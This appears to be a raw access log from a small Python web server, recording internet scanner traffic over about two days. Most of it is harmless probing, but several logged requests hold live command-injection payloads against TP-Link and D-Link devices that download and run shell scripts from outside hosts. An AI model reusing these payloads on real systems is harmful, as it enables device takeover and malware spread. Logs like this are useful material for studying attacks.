45.125.66.34 - - [16/Apr/2024 21:58:17] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [16/Apr/2024 21:58:17] "CONNECT google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [16/Apr/2024 23:06:57] "GET / HTTP/1.1" 200 - 185.161.248.148 - - [16/Apr/2024 23:29:38] code 400, message Bad HTTP/0.9 request type ('\\x03\\x00\\x00/*à\\x00\\x00\\x00\\x00\\x00Cookie:') 185.161.248.148 - - [16/Apr/2024 23:29:38] "\x03\x00\x00/*à\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 - 107.151.182.58 - - [16/Apr/2024 23:40:03] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:40:03] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:40:18] "GET / HTTP/1.1" 200 - 107.151.182.58 - - [16/Apr/2024 23:40:34] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:40:34] "GET /index.jsp HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:40:50] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:40:50] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:41:08] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:41:08] "GET /api/session/properties HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:41:28] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:41:28] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:41:49] "GET / HTTP/1.1" 200 - 107.151.182.58 - - [16/Apr/2024 23:41:49] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:41:49] "GET /favicon-32x32.png HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:41:52] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:41:52] "GET /webfig/ HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:42:09] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:42:09] "GET /static/historypage.js HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:42:26] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:42:26] "GET /admin/ HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:42:27] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:42:27] "GET /zabbix/favicon.ico HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:42:38] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:42:38] "GET /favicon.ico HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:42:51] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:42:51] "GET /identity HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:42:58] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:42:58] "GET /sugar_version.json HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:43:04] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:43:04] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:43:04] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:43:04] "GET /favicon.ico HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:43:05] "GET / HTTP/1.1" 200 - 107.151.182.58 - - [16/Apr/2024 23:43:05] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:43:05] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:43:05] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:43:05] "GET /showLogin.cc HTTP/1.1" 404 - 107.151.182.58 - - [16/Apr/2024 23:43:10] "GET / HTTP/1.1" 200 - 107.151.182.58 - - [16/Apr/2024 23:43:11] code 404, message File not found 107.151.182.58 - - [16/Apr/2024 23:43:11] "GET /solr/ HTTP/1.1" 404 - 180.149.125.172 - - [17/Apr/2024 00:26:21] "GET / HTTP/1.1" 200 - 46.174.191.28 - - [17/Apr/2024 00:31:49] "GET / HTTP/1.0" 200 - 194.50.16.190 - - [17/Apr/2024 01:11:33] "GET / HTTP/1.1" 200 - 103.161.230.13 - - [17/Apr/2024 01:12:29] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('69.164.217.245', 33642) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 69.164.217.245 - - [17/Apr/2024 01:27:15] "GET / HTTP/1.1" 200 - ---------------------------------------- Exception occurred during processing of request from ('167.94.146.57', 51598) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.146.57 - - [17/Apr/2024 01:40:41] "GET / HTTP/1.1" 200 - 167.94.146.57 - - [17/Apr/2024 01:40:45] "GET / HTTP/1.1" 200 - 167.94.146.57 - - [17/Apr/2024 01:40:45] code 505, message Invalid HTTP version (2.0) 167.94.146.57 - - [17/Apr/2024 01:40:45] "PRI * HTTP/2.0" 505 - 167.94.146.57 - - [17/Apr/2024 01:40:46] code 404, message File not found 167.94.146.57 - - [17/Apr/2024 01:40:46] "GET /favicon.ico HTTP/1.1" 404 - 172.104.11.51 - - [17/Apr/2024 01:45:04] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [17/Apr/2024 02:06:41] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [17/Apr/2024 02:06:41] "CONNECT google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [17/Apr/2024 02:11:29] "GET / HTTP/1.1" 200 - 103.194.88.13 - - [17/Apr/2024 02:51:35] "GET / HTTP/1.1" 200 - 34.79.162.186 - - [17/Apr/2024 03:00:05] "GET / HTTP/1.1" 200 - 165.154.33.72 - - [17/Apr/2024 03:05:49] code 400, message Bad request version ('\\x00\\x9ę̪\\x003\\x00=\\x00\\x16À') 165.154.33.72 - - [17/Apr/2024 03:05:49] "\x16\x03\x01\x01\x17\x01\x00\x01\x13\x03\x03i\x92\x11\x92» }l5f\x87­j§}\x83aÁ0ôâõn\x82qþ"#\x8b¯üZ ªÝ¿\x8f\x018/\x9eoQ\x19V~.kzSô:o}4öP\x02W³ò\x11àwº\x004̨̩À/À0À+À,À\x09\x00\x9ę̪\x003\x00=\x00\x16À" 400 - 165.154.33.72 - - [17/Apr/2024 03:05:59] "GET / HTTP/1.1" 200 - 165.154.33.72 - - [17/Apr/2024 03:06:00] code 404, message File not found 165.154.33.72 - - [17/Apr/2024 03:06:00] "GET /favicon.ico HTTP/1.1" 404 - 165.154.33.72 - - [17/Apr/2024 03:06:00] code 404, message File not found 165.154.33.72 - - [17/Apr/2024 03:06:00] "GET /robots.txt HTTP/1.1" 404 - 165.154.33.72 - - [17/Apr/2024 03:06:01] code 404, message File not found 165.154.33.72 - - [17/Apr/2024 03:06:01] "GET /sitemap.xml HTTP/1.1" 404 - 80.75.212.75 - - [17/Apr/2024 03:23:25] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [17/Apr/2024 03:23:25] "CONNECT www.google.com:443 HTTP/1.1" 501 - 185.224.128.43 - - [17/Apr/2024 03:28:17] "GET / HTTP/1.1" 200 - 207.90.244.3 - - [17/Apr/2024 05:25:24] "GET / HTTP/1.1" 200 - 207.90.244.3 - - [17/Apr/2024 05:25:25] code 404, message File not found 207.90.244.3 - - [17/Apr/2024 05:25:25] "GET /robots.txt HTTP/1.1" 404 - 207.90.244.3 - - [17/Apr/2024 05:25:26] code 404, message File not found 207.90.244.3 - - [17/Apr/2024 05:25:26] "GET /sitemap.xml HTTP/1.1" 404 - 207.90.244.3 - - [17/Apr/2024 05:25:26] code 404, message File not found 207.90.244.3 - - [17/Apr/2024 05:25:26] "GET /.well-known/security.txt HTTP/1.1" 404 - 207.90.244.3 - - [17/Apr/2024 05:25:27] code 404, message File not found 207.90.244.3 - - [17/Apr/2024 05:25:27] "GET /favicon.ico HTTP/1.1" 404 - 216.219.94.195 - - [17/Apr/2024 06:26:39] code 404, message File not found 216.219.94.195 - - [17/Apr/2024 06:26:39] "GET /Kvsh/geti.php HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('199.45.154.54', 44124) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 199.45.154.54 - - [17/Apr/2024 07:18:08] "GET / HTTP/1.1" 200 - 199.45.154.54 - - [17/Apr/2024 07:18:12] "GET / HTTP/1.1" 200 - 199.45.154.54 - - [17/Apr/2024 07:18:12] code 505, message Invalid HTTP version (2.0) 199.45.154.54 - - [17/Apr/2024 07:18:12] "PRI * HTTP/2.0" 505 - 199.45.154.54 - - [17/Apr/2024 07:18:13] code 404, message File not found 199.45.154.54 - - [17/Apr/2024 07:18:13] "GET /favicon.ico HTTP/1.1" 404 - 185.224.128.43 - - [17/Apr/2024 07:19:51] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [17/Apr/2024 07:33:43] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [17/Apr/2024 08:24:08] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [17/Apr/2024 08:24:08] "CONNECT google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [17/Apr/2024 09:27:35] "GET / HTTP/1.1" 200 - 103.149.26.160 - - [17/Apr/2024 09:43:54] "GET / HTTP/1.1" 200 - 216.219.94.195 - - [17/Apr/2024 09:59:19] code 404, message File not found 216.219.94.195 - - [17/Apr/2024 09:59:19] "GET /Kvsh/c.php?server=1&type=1 HTTP/1.1" 404 - 45.125.66.34 - - [17/Apr/2024 10:21:16] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [17/Apr/2024 10:21:16] "CONNECT google.com:443 HTTP/1.1" 501 - 185.242.226.99 - - [17/Apr/2024 10:40:14] "GET / HTTP/1.1" 200 - 46.174.191.28 - - [17/Apr/2024 10:52:00] "GET / HTTP/1.0" 200 - 146.19.24.28 - - [17/Apr/2024 10:54:49] "GET / HTTP/1.1" 200 - 80.75.212.75 - - [17/Apr/2024 11:07:38] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [17/Apr/2024 11:07:38] "CONNECT www.google.com:443 HTTP/1.1" 501 - 205.210.31.80 - - [17/Apr/2024 11:37:42] "GET / HTTP/1.0" 200 - 194.120.230.94 - - [17/Apr/2024 11:50:21] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [17/Apr/2024 12:14:11] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [17/Apr/2024 12:53:34] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [17/Apr/2024 12:57:45] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 - 87.236.176.188 - - [17/Apr/2024 13:02:39] "GET / HTTP/1.1" 200 - 83.97.73.245 - - [17/Apr/2024 13:41:54] code 404, message File not found 83.97.73.245 - - [17/Apr/2024 13:41:54] "GET /actuator/gateway/routes HTTP/1.1" 404 - 180.149.125.164 - - [17/Apr/2024 13:43:57] code 404, message File not found 180.149.125.164 - - [17/Apr/2024 13:43:57] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 404 - 87.121.69.52 - - [17/Apr/2024 14:14:33] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [17/Apr/2024 14:14:33] "CONNECT google.com:443 HTTP/1.1" 501 - 74.82.47.2 - - [17/Apr/2024 14:18:03] code 400, message Bad request version ('À\\x14À') 74.82.47.2 - - [17/Apr/2024 14:18:03] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03+!d\x16ÀÑ\x81DÙ\x94+q|ÒÌ\x8bÞn¸Uj\x1bQ¹¶+> q\\AR\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 146.19.24.28 - - [17/Apr/2024 14:25:29] "GET / HTTP/1.1" 200 - 193.106.29.125 - - [17/Apr/2024 14:36:17] "GET / HTTP/1.0" 200 - 152.42.176.18 - - [17/Apr/2024 15:04:16] code 404, message File not found 152.42.176.18 - - [17/Apr/2024 15:04:16] "GET http://httpbin.org/ip HTTP/1.1" 404 - 216.218.206.67 - - [17/Apr/2024 15:21:48] "GET / HTTP/1.1" 200 - 195.140.227.163 - - [17/Apr/2024 15:54:45] code 404, message File not found 195.140.227.163 - - [17/Apr/2024 15:54:45] "GET /manager/html HTTP/1.1" 404 - 35.203.210.83 - - [17/Apr/2024 16:25:04] "GET / HTTP/1.1" 200 - 185.180.143.79 - - [17/Apr/2024 16:53:51] "GET / HTTP/1.1" 200 - 185.180.143.79 - - [17/Apr/2024 16:53:51] code 404, message File not found 185.180.143.79 - - [17/Apr/2024 16:53:51] "GET /wp-content/plugins/kingcomposer/readme.txt HTTP/1.1" 404 - 146.19.24.28 - - [17/Apr/2024 16:55:49] "GET / HTTP/1.1" 200 - 185.224.128.43 - - [17/Apr/2024 17:16:24] "GET / HTTP/1.1" 200 - 205.210.31.176 - - [17/Apr/2024 17:54:50] code 400, message Bad request version ('À\\x13À') 205.210.31.176 - - [17/Apr/2024 17:54:50] "\x16\x03\x01\x00î\x01\x00\x00ê\x03\x03»#Í3ÈËÖHz\x86\x0bA}ê-âgÏ­Zv¬\x8dÂh"µ\x7f²\x978\x00 &\x05\x86}\x00®ºá5¯5è1\x02\x10ÙðÆ\x90.\x9c\x9cP\x9enRTÝè\x07\x99Ä\x00&À+À/À,À0̨̩À\x09À\x13À" 400 - 205.210.31.176 - - [17/Apr/2024 17:54:50] code 400, message Bad request version ('À(À$À\\x14À') 205.210.31.176 - - [17/Apr/2024 17:54:50] "\x16\x03\x01\x00Ê\x01\x00\x00Æ\x03\x03Ë![M)ð1xå\x90?\x94Ò\x1d:_·\x0b\x02JÀ1z¸|\x83\x09#Ò|@a\x00\x00hÌ\x14Ì\x13À/À+À0À,À\x11À\x07À'À#À\x13À\x09À(À$À\x14À" 400 - 80.75.212.75 - - [17/Apr/2024 17:55:10] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [17/Apr/2024 17:55:10] "CONNECT www.google.com:443 HTTP/1.1" 501 - 61.3.2.113 - - [17/Apr/2024 18:12:23] "GET / HTTP/1.1" 200 - 134.209.191.114 - - [17/Apr/2024 18:14:20] code 400, message Bad request version ('¼\\x10\\x98vÆ4¸\\x8c\\x19xÙ\\x03Ò8\\x0f\\x1aØ/c\\x80]ýåÄá\\\\\\x00\\x01<Ì\\x14Ì\\x13Ì\\x15À0À,À(À$À\\x14À') 134.209.191.114 - - [17/Apr/2024 18:14:20] "\x16\x03\x01\x01þ\x01\x00\x01ú\x03\x03ò\x133 \x80 ¼\x10\x98vÆ4¸\x8c\x19xÙ\x03Ò8\x0f\x1aØ/c\x80]ýåÄá\\\x00\x01<Ì\x14Ì\x13Ì\x15À0À,À(À$À\x14À" 400 - 146.19.24.28 - - [17/Apr/2024 18:41:12] "GET / HTTP/1.1" 200 - 34.140.130.61 - - [17/Apr/2024 19:10:00] "GET / HTTP/1.1" 200 - 146.190.57.24 - - [17/Apr/2024 19:19:47] code 404, message File not found 146.190.57.24 - - [17/Apr/2024 19:19:47] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 - 146.190.57.24 - - [17/Apr/2024 19:19:48] code 404, message File not found 146.190.57.24 - - [17/Apr/2024 19:19:48] "GET /Pages/log/ HTTP/1.1" 404 - 146.19.24.28 - - [17/Apr/2024 20:25:25] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [17/Apr/2024 20:32:33] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [17/Apr/2024 20:32:33] "CONNECT google.com:443 HTTP/1.1" 501 - 212.70.149.134 - - [17/Apr/2024 21:05:44] "GET / HTTP/1.0" 200 - 66.240.205.34 - - [17/Apr/2024 21:09:03] code 400, message Bad request version ('ô') 66.240.205.34 - - [17/Apr/2024 21:09:03] "H\x00\x00\x00tj¨\x9e#D\x98+Êð§»lÅ\x19×\x8d¶\x18íJ\x1enÁùxu[lðE\x1d-jìÔxLÉrÉ\x15\x10uà%\x86Rtg\x05fv\x86]%Ì\x80\x0cèÏ®\x00µÀfÈ\x8dDÅ\x09ô" 400 - 80.94.92.60 - - [17/Apr/2024 21:18:08] code 404, message File not found 80.94.92.60 - - [17/Apr/2024 21:18:08] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cm0JLXJmCWJydWguc2gJfAl3Z2V0CWh0dHA6Ly85NC4xNTYuOC4yNDQvYnJ1aC5zaAl8CXNsZWVwCTUJJiYJL2Jpbi9zaAlicnVoLnNo HTTP/1.1" 404 - 34.78.6.216 - - [17/Apr/2024 22:11:20] "GET / HTTP/1.1" 200 - 80.94.92.60 - - [17/Apr/2024 22:12:09] code 404, message File not found 80.94.92.60 - - [17/Apr/2024 22:12:09] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=cm0JLXJmCWxvbAl8CXdnZXQJLU8tCWh0dHA6Ly85NC4xNTYuOC4yNDQvbG9sfHNo HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('51.195.192.54', 51925) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 78.153.140.179 - - [17/Apr/2024 22:55:53] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x00Þ\\x01\\x00\\x00Ú\\x03\\x035óÜ]\\x14Æ(z°QXÒÙ\\x95ÉÏÙ@«zw\\x8cdQE±oM®ËN4\\x00\\x00nÀ0À,À2À.À/À+À1À-\\x00¥\\x00£\\x00¡\\x00\\x9f\\x00¤\\x00¢\\x00') 78.153.140.179 - - [17/Apr/2024 22:55:53] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x035óÜ]\x14Æ(z°QXÒÙ\x95ÉÏÙ@«zw\x8cdQE±oM®ËN4\x00\x00nÀ0À,À2À.À/À+À1À-\x00¥\x00£\x00¡\x00\x9f\x00¤\x00¢\x00 \x00\x9eÀ(À$À\x14À" 400 - 78.153.140.179 - - [17/Apr/2024 22:55:54] code 404, message File not found 78.153.140.179 - - [17/Apr/2024 22:55:54] "GET /.env HTTP/1.1" 404 - 185.224.128.43 - - [17/Apr/2024 22:58:07] "GET / HTTP/1.1" 200 - 64.62.197.36 - - [17/Apr/2024 23:42:43] "GET / HTTP/1.1" 200 - 61.219.11.155 - - [17/Apr/2024 23:43:55] code 400, message Bad request version ('þ«É\\x86@ËÑkUùïZ15Çà\\x0e/±meßPB\\x03À\\x98') 61.219.11.155 - - [17/Apr/2024 23:43:55] "&i\x7fÉ\x9ey ¿\x19úK§®^±vO\x01¤ÈÓ\x1c\x16,G|\x83¶\x0f\\æÈ\x8e&W\x8e\x1aà\x06¶ÉË7É\x80\x93PcúÙDÇ´\x1bb\x9d\x83\x80´Ø{\x02Â,ad¥\x88\x89Î:[L·1²\x0f¦Ö`\x9b¡¦\x91ýi\x8fo3Ð\x01\x9dª\x96¹Ì ,ÝÖõçùvi\x86øK¡!V\x08ÑD0]\x05è6:\x12\x1f\x09üý(Ëu\x1e\x95Ôï\x86©\x04$Þ5r"bqõ\x8b\x9c\x17§\x87\x88??AÇû[P\x9fî\x1d\x16Á*üdË¥ÍH\x91 \x93z#X\x07¯\x95¯ÁÊÓÿÐ\x0b}ô¨Ú×\x9eâos\x95\\"\x0f(XïºL,$HæèN_ÃÊ2ÓEÊh8D®u¡\x96\x0dÂÂnm\x1fþ«É\x86@ËÑkUùïZ15Çà\x0e/±meßPB\x03À\x98" 400 - 64.62.197.42 - - [17/Apr/2024 23:45:03] code 404, message File not found 64.62.197.42 - - [17/Apr/2024 23:45:03] "GET /favicon.ico HTTP/1.1" 404 - 64.62.197.42 - - [17/Apr/2024 23:45:40] code 404, message File not found 64.62.197.42 - - [17/Apr/2024 23:45:40] "GET /geoserver/web/ HTTP/1.1" 404 - 192.241.223.85 - - [18/Apr/2024 00:33:48] code 400, message Bad request syntax ('MGLNDD_203.219.129.101_80') 192.241.223.85 - - [18/Apr/2024 00:33:48] "MGLNDD_203.219.129.101_80" 400 - 179.43.190.218 - - [18/Apr/2024 00:41:40] code 404, message File not found 179.43.190.218 - - [18/Apr/2024 00:41:40] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 36.75.148.101 - - [18/Apr/2024 00:47:43] "GET / HTTP/1.1" 200 - 194.50.16.190 - - [18/Apr/2024 00:54:07] "GET / HTTP/1.1" 200 - 45.125.66.34 - - [18/Apr/2024 00:59:42] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [18/Apr/2024 00:59:42] "CONNECT google.com:443 HTTP/1.1" 501 - 80.94.92.60 - - [18/Apr/2024 01:09:55] "GET / HTTP/1.1" 200 - 185.191.126.213 - - [18/Apr/2024 01:24:56] "GET / HTTP/1.1" 200 - 198.199.103.54 - - [18/Apr/2024 01:52:12] "GET / HTTP/1.1" 200 - 172.104.242.173 - - [18/Apr/2024 02:36:16] code 400, message Bad request version ('¯+\\xadKkÅà\\\\s\\x9c½Ë') 172.104.242.173 - - [18/Apr/2024 02:36:16] "º«d¡EZCÛM\x87î^ý¿\x159 XÔ>\x12\x98Ä<à\x13Ï\x00¬ 9×\x90#8~\x8cÞ\x9dReF¿%1Qà\x9d\x06&g»\x82\x95\x19í\x07\x14\x19ZP\x80+\x94eÃæ\x85\x06¤\x99\x8b\x19l\x01ê\x88Y\x91\x16\x95ÄÈ\x0eH\x02Ç\x93gÁ4FW\x05|ûóT¸ýË»)ãÎÝÍ7\x9eïP\x8c¤[Vý\x98Él\x82õäÁd\x87X÷\x9b¿èq\x12\x99&Û,õ\x87ר\x97j;ã꧴°\x02­\x8dE\x9bªB\x80\x0e)©é¯}\x18\x8e¸\x1e\x99\x04ï¨\x8cè\x04âÓí)1\x91Á\x8f\x88\x8c\x81ðÛ¥\x88\x95H\x9bZ«Î¿ôE%P*\x88KFY6\x9eç::jÔ\x8a¨V\x9aª«¯Ã&.í[\x04Åe\x7f\x08¾\x8ar§°\x99F÷\x11åÖ\x96\x8cIm+w\x1cýuU\x14\x0f!x¬èMPyÃ\x19!2 íÀ}!Rw\x14\x8e\x1bÄá ¯+­KkÅà\\s\x9c½Ë" 400 - 117.235.60.38 - - [18/Apr/2024 02:49:17] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [18/Apr/2024 02:49:40] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [18/Apr/2024 02:49:40] "CONNECT google.com:443 HTTP/1.1" 501 - 116.26.140.93 - - [18/Apr/2024 03:16:50] code 404, message File not found 116.26.140.93 - - [18/Apr/2024 03:16:50] "HEAD /phpmyadmin/index.php HTTP/1.1" 404 - 46.174.191.28 - - [18/Apr/2024 03:54:47] "GET / HTTP/1.0" 200 - 185.224.128.43 - - [18/Apr/2024 03:55:35] "GET / HTTP/1.1" 200 - 146.19.24.28 - - [18/Apr/2024 04:33:46] "GET / HTTP/1.1" 200 - 107.170.208.22 - - [18/Apr/2024 04:38:34] code 404, message File not found 107.170.208.22 - - [18/Apr/2024 04:38:34] "GET /actuator/health HTTP/1.1" 404 - ---------------------------------------- Exception occurred during processing of request from ('167.94.145.53', 58506) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 167.94.145.53 - - [18/Apr/2024 05:26:38] "GET / HTTP/1.1" 200 - 167.94.145.53 - - [18/Apr/2024 05:26:41] "GET / HTTP/1.1" 200 - 167.94.145.53 - - [18/Apr/2024 05:26:42] code 505, message Invalid HTTP version (2.0) 167.94.145.53 - - [18/Apr/2024 05:26:42] "PRI * HTTP/2.0" 505 - 167.94.145.53 - - [18/Apr/2024 05:26:43] code 404, message File not found 167.94.145.53 - - [18/Apr/2024 05:26:43] "GET /favicon.ico HTTP/1.1" 404 - 80.75.212.75 - - [18/Apr/2024 05:36:21] code 501, message Unsupported method ('CONNECT') 80.75.212.75 - - [18/Apr/2024 05:36:21] "CONNECT www.google.com:443 HTTP/1.1" 501 - 184.105.139.67 - - [18/Apr/2024 05:50:50] "GET / HTTP/1.1" 200 - 184.105.139.67 - - [18/Apr/2024 05:54:06] code 404, message File not found 184.105.139.67 - - [18/Apr/2024 05:54:06] "GET /favicon.ico HTTP/1.1" 404 - 184.105.139.67 - - [18/Apr/2024 05:54:46] code 404, message File not found 184.105.139.67 - - [18/Apr/2024 05:54:46] "GET /geoserver/web/ HTTP/1.1" 404 - 212.70.149.134 - - [18/Apr/2024 06:19:54] code 404, message File not found 212.70.149.134 - - [18/Apr/2024 06:19:54] "GET /cgi/conf.bin HTTP/1.1" 404 - 179.43.190.218 - - [18/Apr/2024 06:27:02] code 404, message File not found 179.43.190.218 - - [18/Apr/2024 06:27:02] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.180.143.136 - - [18/Apr/2024 06:39:53] "GET / HTTP/1.1" 200 - 92.118.39.120 - - [18/Apr/2024 07:36:47] code 404, message File not found 92.118.39.120 - - [18/Apr/2024 07:36:47] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(curl+http%3A%2F%2F193.222.96.163%2Ft.sh+%7C+sh+%7C%7C+wget+-O-+http%3A%2F%2F193.222.96.163%2Ft.sh+%7C+sh) HTTP/1.1" 404 - 92.118.39.120 - - [18/Apr/2024 07:36:48] code 404, message File not found 92.118.39.120 - - [18/Apr/2024 07:36:48] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(curl+http%3A%2F%2F193.222.96.163%2Ft.sh+%7C+sh+%7C%7C+wget+-O-+http%3A%2F%2F193.222.96.163%2Ft.sh+%7C+sh) HTTP/1.1" 404 - 192.241.225.76 - - [18/Apr/2024 